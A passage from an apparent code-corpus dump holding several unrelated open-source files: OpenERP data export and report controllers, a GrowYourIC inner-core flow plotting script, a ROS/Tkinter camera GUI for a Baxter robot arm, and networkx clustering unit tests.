""" Returns all valid export formats
:returns: for each export format, a pair of identifier and printable name
:rtype: [(str, str)]
"""
return sorted([
controller.fmt
for path, controller in openerpweb.controllers_path.iteritems()
if path.startswith(self._cp_path)
if hasattr(controller, 'fmt')
], key=operator.itemgetter("label"))
def fields_get(self, req, model):
Model = req.session.model(model)
fields = Model.fields_get(False, req.context)
return fields
@openerpweb.jsonrequest
def get_fields(self, req, model, prefix='', parent_name= '',
import_compat=True, parent_field_type=None,
exclude=None):
if import_compat and parent_field_type == "many2one":
fields = {}
else:
fields = self.fields_get(req, model)
if import_compat:
fields.pop('id', None)
else:
fields['.id'] = fields.pop('id', {'string': 'ID'})
fields_sequence = sorted(fields.iteritems(),
key=lambda field: openerp.tools.ustr(field[1].get('string', '')))
records = []
for field_name, field in fields_sequence:
if import_compat:
if exclude and field_name in exclude:
continue
if field.get('readonly'):
# If none of the field's states unsets readonly, skip the field
if all(dict(attrs).get('readonly', True)
for attrs in field.get('states', {}).values()):
continue
if not field.get('exportable', True):
continue
id = prefix + (prefix and '/'or '') + field_name
name = parent_name + (parent_name and '/' or '') + field['string']
record = {'id': id, 'string': name,
'value': id, 'children': False,
'field_type': field.get('type'),
'required': field.get('required'),
'relation_field': field.get('relation_field')}
records.append(record)
if len(name.split('/')) < 3 and 'relation' in field:
ref = field.pop('relation')
record['value'] += '/id'
record['params'] = {'model': ref, 'prefix': id, 'name': name}
if not import_compat or field['type'] == 'one2many':
# m2m field in import_compat is childless
record['children'] = True
return records
@openerpweb.jsonrequest
def namelist(self,req, model, export_id):
# TODO: namelist really has no reason to be in Python (although itertools.groupby helps)
export = req.session.model("ir.exports").read([export_id])[0]
export_fields_list = req.session.model("ir.exports.line").read(
export['export_fields'])
fields_data = self.fields_info(
req, model, map(operator.itemgetter('name'), export_fields_list))
return [
{'name': field['name'], 'label': fields_data[field['name']]}
for field in export_fields_list
]
def fields_info(self, req, model, export_fields):
info = {}
fields = self.fields_get(req, model)
if ".id" in export_fields:
fields['.id'] = fields.pop('id', {'string': 'ID'})
# To make fields retrieval more efficient, fetch all sub-fields of a
# given field at the same time. Because the order in the export list is
# arbitrary, this requires ordering all sub-fields of a given field
# together so they can be fetched at the same time
#
# Works the following way:
# * sort the list of fields to export, the default sorting order will
# put the field itself (if present, for xmlid) and all of its
# sub-fields right after it
# * then, group on: the first field of the path (which is the same for
# a field and for its subfields and the length of splitting on the
# first '/', which basically means grouping the field on one side and
# all of the subfields on the other. This way, we have the field (for
# the xmlid) with length 1, and all of the subfields with the same
# base but a length "flag" of 2
# * if we have a normal field (length 1), just add it to the info
# mapping (with its string) as-is
# * otherwise, recursively call fields_info via graft_subfields.
# all graft_subfields does is take the result of fields_info (on the
# field's model) and prepend the current base (current field), which
# rebuilds the whole sub-tree for the field
#
# result: because we're not fetching the fields_get for half the
# database models, fetching a namelist with a dozen fields (including
# relational data) falls from ~6s to ~300ms (on the leads model).
# export lists with no sub-fields (e.g. import_compatible lists with
# no o2m) are even more efficient (from the same 6s to ~170ms, as
# there's a single fields_get to execute)
for (base, length), subfields in itertools.groupby(
sorted(export_fields),
lambda field: (field.split('/', 1)[0], len(field.split('/', 1)))):
subfields = list(subfields)
if length == 2:
# subfields is a seq of $base/*rest, and not loaded yet
info.update(self.graft_subfields(
req, fields[base]['relation'], base, fields[base]['string'],
subfields
))
elif base in fields:
info[base] = fields[base]['string']
return info
def graft_subfields(self, req, model, prefix, prefix_string, fields):
export_fields = [field.split('/', 1)[1] for field in fields]
return (
(prefix + '/' + k, prefix_string + '/' + v)
for k, v in self.fields_info(req, model, export_fields).iteritems())
class ExportFormat(object):
@property
def content_type(self):
""" Provides the format's content type """
raise NotImplementedError()
def filename(self, base):
""" Creates a valid filename for the format (with extension) from the
provided base name (exension-less)
"""
raise NotImplementedError()
def from_data(self, fields, rows):
""" Conversion method from OpenERP's export data to whatever the
current export class outputs
:params list fields: a list of fields to export
:params list rows: a list of records to export
:returns:
:rtype: bytes
"""
raise NotImplementedError()
@openerpweb.httprequest
def index(self, req, data, token):
params = simplejson.loads(data)
model, fields, ids, domain, import_compat = \
operator.itemgetter('model', 'fields', 'ids', 'domain',
'import_compat')(
params)
Model = req.session.model(model)
context = dict(req.context or {}, **params.get('context', {}))
ids = ids or Model.search(domain, 0, False, False, context)
field_names = map(operator.itemgetter('name'), fields)
import_data = Model.export_data(ids, field_names, context).get('datas',[])
if import_compat:
columns_headers = field_names
else:
columns_headers = [val['label'].strip() for val in fields]
return req.make_response(self.from_data(columns_headers, import_data),
headers=[('Content-Disposition',
content_disposition(self.filename(model), req)),
('Content-Type', self.content_type)],
cookies={'fileToken': token})
class CSVExport(ExportFormat, http.Controller):
_cp_path = '/web/export/csv'
fmt = {'tag': 'csv', 'label': 'CSV'}
@property
def content_type(self):
return 'text/csv;charset=utf8'
def filename(self, base):
return base + '.csv'
def from_data(self, fields, rows):
fp = StringIO()
writer = csv.writer(fp, quoting=csv.QUOTE_ALL)
writer.writerow([name.encode('utf-8') for name in fields])
for data in rows:
row = []
for d in data:
if isinstance(d, basestring):
d = d.replace('\n',' ').replace('\t',' ')
try:
d = d.encode('utf-8')
except UnicodeError:
pass
if d is False: d = None
row.append(d)
writer.writerow(row)
fp.seek(0)
data = fp.read()
fp.close()
return data
class ExcelExport(ExportFormat, http.Controller):
_cp_path = '/web/export/xls'
fmt = {
'tag': 'xls',
'label': 'Excel',
'error': None if xlwt else "XLWT required"
}
@property
def content_type(self):
return 'application/vnd.ms-excel'
def filename(self, base):
return base + '.xls'
def from_data(self, fields, rows):
workbook = xlwt.Workbook()
worksheet = workbook.add_sheet('Sheet 1')
for i, fieldname in enumerate(fields):
worksheet.write(0, i, fieldname)
worksheet.col(i).width = 8000 # around 220 pixels
style = xlwt.easyxf('align: wrap yes')
for row_index, row in enumerate(rows):
for cell_index, cell_value in enumerate(row):
if isinstance(cell_value, basestring):
cell_value = re.sub("\r", " ", cell_value)
if cell_value is False: cell_value = None
worksheet.write(row_index + 1, cell_index, cell_value, style)
fp = StringIO()
workbook.save(fp)
fp.seek(0)
data = fp.read()
fp.close()
return data
class Reports(openerpweb.Controller):
_cp_path = "/web/report"
POLLING_DELAY = 0.25
TYPES_MAPPING = {
'doc': 'application/vnd.ms-word',
'html': 'text/html',
'odt': 'application/vnd.oasis.opendocument.text',
'pdf': 'application/pdf',
'sxw': 'application/vnd.sun.xml.writer',
'xls': 'application/vnd.ms-excel',
}
@openerpweb.httprequest
def index(self, req, action, token):
action = simplejson.loads(action)
report_srv = req.session.proxy("report")
context = dict(req.context)
context.update(action["context"])
report_data = {}
report_ids = context["active_ids"]
if 'report_type' in action:
report_data['report_type'] = action['report_type']
if 'datas' in action:
if 'ids' in action['datas']:
report_ids = action['datas'].pop('ids')
report_data.update(action['datas'])
report_id = report_srv.report(
req.session._db, req.session._uid, req.session._password,
action["report_name"], report_ids,
report_data, context)
report_struct = None
while True:
report_struct = report_srv.report_get(
req.session._db, req.session._uid, req.session._password, report_id)
if report_struct["state"]:
break
time.sleep(self.POLLING_DELAY)
report = base64.b64decode(report_struct['result'])
if report_struct.get('code') == 'zlib':
report = zlib.decompress(report)
report_mimetype = self.TYPES_MAPPING.get(
report_struct['format'], 'octet-stream')
file_name = action['report_name']
# Try to get current object model and their ids from context
if 'context' in action:
action_context = action['context']
if (action_context.get('active_model')
and action_context['active_ids']):
# Use built-in ORM method to get data from DB
m = req.session.model(action_context['active_model'])
r = []
try:
r = m.name_get(action_context['active_ids'], context)
except xmlrpclib.Fault:
#we assume this went wrong because of incorrect/missing
#_rec_name. We don't have access to _columns here to do
# a proper check
pass
# Parse result to create a better filename
item_names = [item[1] or str(item[0]) for item in r]
if action.get('name'):
item_names.insert(0, action['name'])
if item_names:
file_name = '-'.join(item_names)[:251]
file_name = '%s.%s' % (file_name, report_struct['format'])
# Create safe filename
p = re.compile('[/:(")<>|?*]|(\\\)')
file_name = p.sub('_', file_name)
return req.make_response(report,
headers=[
('Content-Disposition', content_disposition(file_name, req)),
('Content-Type', report_mimetype),
('Content-Length', len(report))],
cookies={'fileToken': token})
# vim:expandtab:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
MarineLasbleis/GrowYourIC
|
notebooks/Yoshida.py
|
1
|
4212
|
# -*- coding: UTF-8 -*-
import numpy as np
import matplotlib.pyplot as plt #for figures
#from mpl_toolkits.basemap import Basemap #to render maps
import math
from GrowYourIC import tracers, positions, geodyn, geodyn_trg, geodyn_static, plot_data, data, geodyn_analytical_flows
#plt.rcParams['figure.figsize'] = (8.0, 3.0) #size of figures
cm = plt.cm.get_cmap('viridis_r')
#V = 0.2 # translation velocity
#S2 = 1/5.
#Yoshida = geodyn_analytical_flows.Yoshida96(V, S=S2)
#file = "Fig/Yoshida_{}_S2_{}".format(V, S2)
#print(file)
V = [0.2, 0.4]
S2 = [1/5., 4/5., 2.]
for vitesse in V:
for value_S in S2:
Yoshida = geodyn_analytical_flows.Yoshida96(vitesse, S=value_S)
file = "Fig/Yoshida_{}_S2_{}".format(vitesse, value_S)
print(file)
npoints = 50 #number of points in the x direction for the data set.
data_set = data.PerfectSamplingCut(npoints, rICB = 1.)
data_set.method = "bt_point"
# Age plot with velocity field
proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="age", verbose = False)
data_set.plot_c_vec(Yoshida, proxy=proxy, nameproxy="age")
plt.savefig(file+"_age.pdf")
# accumulated deformation
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_acc", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_acc")
#plt.savefig(file+"_vM_acc.pdf")
#data_set.plot_c_vec(Yoshida, proxy=np.log10(proxy), cm=cm, nameproxy="log_vMises_acc")
#plt.savefig(file+"_log_vM_acc.pdf")
# tracers with age
#tracers.Swarm(5, Yoshida, Yoshida.tau_ic/400, "ici", plane="meridional")
#data_set = data.PerfectSamplingCut(20, rICB = 1.)
#data_set.method = "bt_point"
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="age", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, nameproxy="age")
#plt.show()
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_tau_ic")
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_acc", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_acc")
#Karato = geodyn_analytical_flows.Model_LorentzForce()
#proxy = geodyn.evaluate_proxy(data_set, Karato, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy, cm=cm, nameproxy="vMises_tau_ic")
#Karato.P = 1e-4
#proxy = geodyn.evaluate_proxy(data_set, Karato, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy, cm=cm, nameproxy="vMises_tau_ic")
#proxy = geodyn.evaluate_proxy(data_set, Karato, proxy_type="age", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy, cm=cm, nameproxy="age")
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="age", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="age")
#plt.savefig(file+"_tage.pdf")
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_tau_ic")
#plt.savefig(file+"_t_vM.pdf")
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_cart", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_cart")
#plt.savefig("Yoshida_vM.pdf")
#Karato.P = 1e4
#proxy_1 = geodyn.evaluate_proxy(data_set, Karato, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy_1, cm=cm, nameproxy="vMises_tau_ic")
#npoints = 50 #number of points in the x direction for the data set.
#data_set = data.PerfectSamplingCut(npoints, rICB = 1.)
#data_set.method = "bt_point"
#proxy_2 = geodyn.evaluate_proxy(data_set, Karato, proxy_type="age", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy_2, cm=cm, nameproxy="age")
#npoints = 100 #number of points in the x direction for the data set.
#data_set = data.PerfectSamplingCut(npoints, rICB = 1.)
#data_set.method = "bt_point"
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_acc", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_acc")
plt.show()
|
mit
|
UCRoboticsLab/BaxterTictactoe
|
src/baxter_tictactoe/scripts/camera_gui.py
|
1
|
15093
|
#!/usr/bin/env python
"""
A GUI to help user take snapshot with hand camera
"""
import rospy
import struct
import Tkinter as tk
import tkFileDialog, tkMessageBox
import tkSimpleDialog
from baxter_interface.camera import CameraController
from PIL import Image
from PIL import ImageTk, ImageDraw
import numpy as np
from PIL._imaging import outline
import glob
import os
from reportlab.platypus.flowables import ImageAndFlowables
import subprocess
import Queue
from sensor_msgs.msg import Image as ImageMsg
import threading
from cv_bridge import CvBridge, CvBridgeError
from Tkconstants import RIDGE
import copy
from geometry_msgs.msg import (
PoseStamped,
Pose,
Point,
Quaternion,
)
from baxter_core_msgs.srv import (
SolvePositionIK,
SolvePositionIKRequest,
)
from geometry_msgs.msg._PoseStamped import PoseStamped
from std_msgs.msg import Header
from baxter_interface import Limb
class StatusBar(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
self.label = tk.Label(self, bd=1, relief=tk.SUNKEN, anchor=tk.W)
self.label.pack(fill="x", anchor="w")
self.prompt1 = " Saving snapshot files to: "
self.prompt2 = "\n Saving snapeshot file as: "
self.update()
def update(self):
global path, prefix
self.label.config(text=self.prompt1 + path + self.prompt2 + prefix + "_xx", justify="left")
self.label.update_idletasks()
def clear(self):
self.label.config(text="")
self.label.update_idletasks()
class MainWin(object):
"""
represent the main window of the application
"""
global path, prefix
def __init__(self, parent):
self.camera = Cam()
self.bridge = CvBridge() # the open cv bridge
self.animation_node = None # no animation server at beginning
self.max_screen_res = (1024, 600)
#============================== frames =========================================
self.frameA = tk.Frame(parent, highlightbackground="green", highlightcolor="green", highlightthickness=2)
self.frameA.pack(anchor=tk.W, padx = 10, pady = 10)
self.frameB = tk.Frame(parent)
self.frameB.pack(side=tk.BOTTOM, padx = 10, pady = 10)
self.stbar = StatusBar(parent)
self.stbar.pack(side="bottom", fill='x')
#============================= panels ==========================================
self.res_mode = 2
data = np.zeros((400, 640, 3), dtype=np.uint8)
#data = np.zeros(self.camera.cam_proxy.resolution + (3,), dtype=np.uint8)
self.imageA = Image.fromarray(data, 'RGB')
self.imageATk = ImageTk.PhotoImage(self.imageA)
self.panelA = tk.Label(self.frameA, image=self.imageATk, relief=RIDGE, borderwidth = 3)
self.panelA.pack(side=tk.LEFT, padx = 10, pady = 10)
self.imageB = Image.fromarray(data, 'RGB')
self.draw_box()
self.imageB_cv = np.array(self.imageB)
self.imageBTk = ImageTk.PhotoImage(self.imageB)
self.panelB = tk.Label(self.frameA, image=self.imageBTk, relief=RIDGE, borderwidth = 3)
self.panelB.pack(side=tk.LEFT, padx = 10, pady = 10)
#============================= Buttons =====================================
path_btn = tk.Button(self.frameB, text="Select a path", command=self.select_path, width=20)
path_btn.grid(row=0, column=0,padx=10, pady=10)
prefix_btn = tk.Button(self.frameB, text="Select a prefix", command=self.select_prefix, width=20)
prefix_btn.grid(row=1, column=0,padx=10, pady=10)
moveArm_btn = tk.Button(self.frameB, text="Move arm to position", command=self.move_arm, width=20)
moveArm_btn.grid(row=0, column=1,padx=10, pady=10)
snapshot_btn = tk.Button(self.frameB, text="Snapshot", command=self.snapshot, width=20)
snapshot_btn.grid(row=1, column=1,padx=10, pady=10)
restart_btn = tk.Button(self.frameB, text="Restart anime", command=self.restart_node, width=20)
restart_btn.grid(row=1, column=2,padx=10, pady=10)
selfie_btn = tk.Button(self.frameB, text="Selfie pose", command=self.move_to_selfie, width=20)
selfie_btn.grid(row=0, column=2,padx=10, pady=10)
up_btn = tk.Button(self.frameB, text="up", command=self.move_up, width=3)
up_btn.grid(row=0, column=5,padx=10, pady=10)
down_btn = tk.Button(self.frameB, text="down", command=self.move_down, width=3)
down_btn.grid(row=1, column=5,padx=10, pady=10)
def relative_move(self, x, y, z):
'''
move arm related to current pose
:param x: relative displacement in x
:param y: relative displacement in y
:param z: relative displacement in z
'''
global limb
cur_pose = limb.endpoint_pose()
cur_pose_dict = Pose(position=Point(cur_pose["position"][0] + x,
cur_pose["position"][1] + y,
cur_pose["position"][2] + z,),
orientation=cur_pose['orientation'])
joint_angles = self.get_joint_position("left", cur_pose_dict)
if joint_angles is None:
return
limb.move_to_joint_positions(joint_angles, timeout=5, threshold=0.018)
def move_up(self):
'''
move arm up a bit
'''
self.relative_move(x=0, y=0, z=0.03)
def move_down(self):
'''
move arm down a bit
'''
self.relative_move(x=0, y=0, z=-0.03)
def move_to_selfie(self):
'''
move to selfie pose
'''
global selfie_pose, limb
joint_angles = self.get_joint_position("left", selfie_pose)
if joint_angles is None:
return
limb.move_to_joint_positions(joint_angles, timeout=5, threshold=0.0018)
def draw_box(self):
# calculate bounding box pixel size in window display
rect_w, rect_h = tuple(n * pow(0.75, 2) for n in self.max_screen_res)
ori_x = (640 - rect_w)//2
ori_y = (400 - rect_h)//2
draw = ImageDraw.Draw(self.imageB)
draw.rectangle( ((ori_x, ori_y), (ori_x + rect_w, ori_y + rect_h)), outline="red")
def snapshot(self):
'''
take snapshot and save file
'''
#save to files
self.save_file()
#update panelA with captured image
self.imageATk = ImageTk.PhotoImage(self.imageB)
self.panelA.config(image=self.imageATk)
def get_joint_position(self, limb, des_pose):
'''
return a list of joint rotation angles
:param limb: left or right
:param pose: geometry_msgs.pose
'''
ns = "ExternalTools/" + limb + "/PositionKinematicsNode/IKService"
iksvc = rospy.ServiceProxy(ns, SolvePositionIK)
ikreq = SolvePositionIKRequest()
hdr = Header(stamp=rospy.Time.now(), frame_id='base')
poseMsg = PoseStamped(
header=hdr,
pose=copy.deepcopy(des_pose)
)
ikreq.pose_stamp.append(poseMsg)
try:
rospy.wait_for_service(ns, 5.0)
resp = iksvc(ikreq)
except (rospy.ServiceException, rospy.ROSException), e:
rospy.logerr("Service call failed: %s" % (e,))
return None
# Check if result valid, and type of seed ultimately used to get solution
# convert rospy's string representation of uint8[]'s to int's
resp_seeds = struct.unpack('<%dB' % len(resp.result_type),
resp.result_type)
if (resp_seeds[0] != resp.RESULT_INVALID):
seed_str = {
ikreq.SEED_USER: 'User Provided Seed',
ikreq.SEED_CURRENT: 'Current Joint Angles',
ikreq.SEED_NS_MAP: 'Nullspace Setpoints',
}.get(resp_seeds[0], 'None')
print("SUCCESS - Valid Joint Solution Found from Seed Type: %s" %
(seed_str,))
else:
print("INVALID POSE - No Valid Joint Solution Found.")
return dict(zip(resp.joints[0].name, resp.joints[0].position))
def move_arm(self):
'''
move baxter arm to position for snapshot
'''
global cam_pose, limb
joint_angles = self.get_joint_position("left", cam_pose)
if joint_angles is None:
return
limb.move_to_joint_positions(joint_angles, timeout=5, threshold=0.0018)
def select_path(self):
global path, prefix
path = tkFileDialog.askdirectory(parent=root, initialdir='.')
print "get path" + str(path)
self.stbar.update()
def select_prefix(self):
global path, prefix
prefix = tkSimpleDialog.askstring(title="select a prefix", prompt="the saved file will look like " + prefix + "_xx")
self.stbar.update()
def save_file(self):
'''
save file to directory specified with prefix to file name.
The save file name would be like [prefix]_xx, where xx denotes serial number.
'''
global path, prefix
# find the pre-existing file with largest serial number
last_sn = 0
head = None
tail = ".png" # save a .png file by default
fullstr = path + '/' + prefix + '_[0-9]*.png'
for fn in glob.glob(fullstr):
full_name = os.path.split(fn)[1]
head, tail = os.path.splitext(full_name)
sn = head.split('_')[1]
if last_sn < int(sn):
last_sn = int(sn)
new_fn = prefix + '_' + str(last_sn + 1).zfill(2) + tail
new_full_fn = path + '/' + new_fn
print "saved as" + new_full_fn
#crop and resize image for baxter head screen resolution 1024 x 600
rect_w, rect_h = tuple(int(n * pow(0.75, self.res_mode)) for n in self.max_screen_res)
ori_x = (self.camera.cam_proxy.resolution[0] - rect_w)//2
ori_y = (self.camera.cam_proxy.resolution[1] - rect_h)//2
imageB_crop = self.imageB.crop((ori_x, ori_y, ori_x+rect_w, ori_y+rect_h)).resize(self.max_screen_res)
#make a stamp
draw = ImageDraw.Draw(imageB_crop)
draw.text( (20, 20), new_fn, anchor='w')
imageB_crop.save(new_full_fn)
def restart_node(self):
'''
Update image path in animation node and restart
This GUI uses the single express animation server
'''
global path
if self.animation_node is not None:
#kill the process
self.animation_node.kill()
#create new animation node with current path
self.animation_node = subprocess.Popen(["rosrun", "baxter_tictactoe", "animator_server.py", path], shell=False)
def onClose(self):
if tkMessageBox.askokcancel("Quit", "Do you really wish to quit? Animation server will be terminated"):
if self.animation_node is not None and self.animation_node.poll() == None:
# the process is still alive
self.animation_node.terminate()
# never close current camera
root.destroy()
def update_image(self):
'''
Check the image queue for incoming camera image.
by default the camera runs at 25Hz, the GUI refreshing rate should be faster than that
'''
global img_queue
try:
msg = img_queue.get_nowait()
except Queue.Empty:
root.after(10, self.update_image)
return
try:
self.imageB_cv = self.bridge.imgmsg_to_cv2(msg, "rgb8")
except CvBridgeError as e:
print(e)
self.imageB = Image.fromarray(self.imageB_cv)
self.draw_box()
self.imageBTk = ImageTk.PhotoImage(self.imageB)
self.panelB.config(image=self.imageBTk)
root.after(10, self.update_image)
class Cam(object):
"""
represent the selected camera
"""
def __init__(self):
# close the unused camera to allow enough bandwidth
# max 2 cameras allowed at any given time
# uncomment the following lines if can't find related camera service
# CameraController("right_hand_camera").close()
self.cam_proxy = CameraController("left_hand_camera")
# default resolution is 640 x 400
# MODES = [(1280, 800), (960, 600), (640, 400), (480, 300), (384, 240), (320, 200)]
self.res_mode = 2
self.cam_proxy.resolution=CameraController.MODES[self.res_mode]
# open camera by default
self.cam_proxy.open()
def change_cam_to(self, id):
if id == cam_proxy._id:
# same camera, do nothing
return
if self.cam_proxy._open == True:
# close camera in use
self.cam_proxy.close()
# create new camera controller
self.com_proxy = CameraController(id)
#open new camera
self.com_proxy.open()
def change_resolution(self, mode_id):
if CameraController.MODES[mode_id] == self.cam_proxy.resolution:
#nothing to do
return
# update resolution and reopen camera
self.cam_proxy.resolution(CameraController.MODES[mode_id])
def close(self):
self.cam_proxy.close()
def image_callback(data):
global img_queue
#feed in data to the FIFO queue
img_queue.put_nowait(data)
#print "image callback invoked"
def listening():
'''
The listener to the camera image topic.
'''
#rospy.init_node('woz_listener', anonymous=True)
sub = rospy.Subscriber("/cameras/left_hand_camera/image", ImageMsg, image_callback)
rospy.spin()
path = os.path.dirname(os.path.abspath(__file__)) # the saving path for snapshots
prefix = "img" # the prefix for saved files
img_queue = Queue.Queue() # the global queue used to pass on image to Tkinter
rospy.init_node('cam_gui', anonymous=True)
root = tk.Tk()
root.title("Camera GUI")
gui = MainWin(root)
root.protocol("WM_DELETE_WINDOW", gui.onClose)
#initlize limb interface
limb = Limb('left')
cam_pose = Pose(position=Point(x=0.548, y=0.890, z=0.095),
orientation=Quaternion(x=0, y=1, z=0, w=0))
# change the selfie pose to an appropriate value
selfie_pose = Pose(position=Point(x=0.4, y=0.30, z=0.55),
orientation=Quaternion(x=-0.416, y=0.580, z=-0.689, w=0.125))
#start listener thread
lthread = threading.Thread(target=listening, args=[])
lthread.setDaemon(True)
lthread.start()
#schedule the frist update image event in mainloop
root.after(10, gui.update_image)
root.mainloop()
|
apache-2.0
|
cogeorg/BlackRhino
|
examples/firesales_simple/networkx/algorithms/tests/test_cluster.py
|
89
|
7321
|
#!/usr/bin/env python
from nose.tools import *
import networkx as nx
class TestTriangles:
def test_empty(self):
G = nx.Graph()
assert_equal(list(nx.triangles(G).values()),[])
def test_path(self):
G = nx.path_graph(10)
assert_equal(list(nx.triangles(G).values()),
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
assert_equal(nx.triangles(G),
{0: 0, 1: 0, 2: 0, 3: 0, 4: 0,
5: 0, 6: 0, 7: 0, 8: 0, 9: 0})
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(list(nx.triangles(G).values()),
[0, 0, 0, 0, 0, 0, 0, 0])
assert_equal(nx.triangles(G,1),0)
assert_equal(list(nx.triangles(G,[1,2]).values()),[0, 0])
assert_equal(nx.triangles(G,1),0)
assert_equal(nx.triangles(G,[1,2]),{1: 0, 2: 0})
def test_k5(self):
G = nx.complete_graph(5)
assert_equal(list(nx.triangles(G).values()),[6, 6, 6, 6, 6])
assert_equal(sum(nx.triangles(G).values())/3.0,10)
assert_equal(nx.triangles(G,1),6)
G.remove_edge(1,2)
assert_equal(list(nx.triangles(G).values()),[5, 3, 3, 5, 5])
assert_equal(nx.triangles(G,1),3)
class TestWeightedClustering:
def test_clustering(self):
G = nx.Graph()
assert_equal(list(nx.clustering(G,weight='weight').values()),[])
assert_equal(nx.clustering(G),{})
def test_path(self):
G = nx.path_graph(10)
assert_equal(list(nx.clustering(G,weight='weight').values()),
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
assert_equal(nx.clustering(G,weight='weight'),
{0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0, 4: 0.0,
5: 0.0, 6: 0.0, 7: 0.0, 8: 0.0, 9: 0.0})
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(list(nx.clustering(G,weight='weight').values()),
[0, 0, 0, 0, 0, 0, 0, 0])
assert_equal(nx.clustering(G,1),0)
assert_equal(list(nx.clustering(G,[1,2],weight='weight').values()),[0, 0])
assert_equal(nx.clustering(G,1,weight='weight'),0)
assert_equal(nx.clustering(G,[1,2],weight='weight'),{1: 0, 2: 0})
def test_k5(self):
G = nx.complete_graph(5)
assert_equal(list(nx.clustering(G,weight='weight').values()),[1, 1, 1, 1, 1])
assert_equal(nx.average_clustering(G,weight='weight'),1)
G.remove_edge(1,2)
assert_equal(list(nx.clustering(G,weight='weight').values()),
[5./6., 1.0, 1.0, 5./6., 5./6.])
assert_equal(nx.clustering(G,[1,4],weight='weight'),{1: 1.0, 4: 0.83333333333333337})
def test_triangle_and_edge(self):
G=nx.Graph()
G.add_cycle([0,1,2])
G.add_edge(0,4,weight=2)
assert_equal(nx.clustering(G)[0],1.0/3.0)
assert_equal(nx.clustering(G,weight='weight')[0],1.0/6.0)
class TestClustering:
def test_clustering(self):
G = nx.Graph()
assert_equal(list(nx.clustering(G).values()),[])
assert_equal(nx.clustering(G),{})
def test_path(self):
G = nx.path_graph(10)
assert_equal(list(nx.clustering(G).values()),
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
assert_equal(nx.clustering(G),
{0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0, 4: 0.0,
5: 0.0, 6: 0.0, 7: 0.0, 8: 0.0, 9: 0.0})
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(list(nx.clustering(G).values()),
[0, 0, 0, 0, 0, 0, 0, 0])
assert_equal(nx.clustering(G,1),0)
assert_equal(list(nx.clustering(G,[1,2]).values()),[0, 0])
assert_equal(nx.clustering(G,1),0)
assert_equal(nx.clustering(G,[1,2]),{1: 0, 2: 0})
def test_k5(self):
G = nx.complete_graph(5)
assert_equal(list(nx.clustering(G).values()),[1, 1, 1, 1, 1])
assert_equal(nx.average_clustering(G),1)
G.remove_edge(1,2)
assert_equal(list(nx.clustering(G).values()),
[5./6., 1.0, 1.0, 5./6., 5./6.])
assert_equal(nx.clustering(G,[1,4]),{1: 1.0, 4: 0.83333333333333337})
class TestTransitivity:
def test_transitivity(self):
G = nx.Graph()
assert_equal(nx.transitivity(G),0.0)
def test_path(self):
G = nx.path_graph(10)
assert_equal(nx.transitivity(G),0.0)
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(nx.transitivity(G),0.0)
def test_k5(self):
G = nx.complete_graph(5)
assert_equal(nx.transitivity(G),1.0)
G.remove_edge(1,2)
assert_equal(nx.transitivity(G),0.875)
# def test_clustering_transitivity(self):
# # check that weighted average of clustering is transitivity
# G = nx.complete_graph(5)
# G.remove_edge(1,2)
# t1=nx.transitivity(G)
# (cluster_d2,weights)=nx.clustering(G,weights=True)
# trans=[]
# for v in G.nodes():
# trans.append(cluster_d2[v]*weights[v])
# t2=sum(trans)
# assert_almost_equal(abs(t1-t2),0)
class TestSquareClustering:
def test_clustering(self):
G = nx.Graph()
assert_equal(list(nx.square_clustering(G).values()),[])
assert_equal(nx.square_clustering(G),{})
def test_path(self):
G = nx.path_graph(10)
assert_equal(list(nx.square_clustering(G).values()),
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
assert_equal(nx.square_clustering(G),
{0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0, 4: 0.0,
5: 0.0, 6: 0.0, 7: 0.0, 8: 0.0, 9: 0.0})
def test_cubical(self):
G = nx.cubical_graph()
assert_equal(list(nx.square_clustering(G).values()),
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5])
assert_equal(list(nx.square_clustering(G,[1,2]).values()),[0.5, 0.5])
assert_equal(nx.square_clustering(G,[1])[1],0.5)
assert_equal(nx.square_clustering(G,[1,2]),{1: 0.5, 2: 0.5})
def test_k5(self):
G = nx.complete_graph(5)
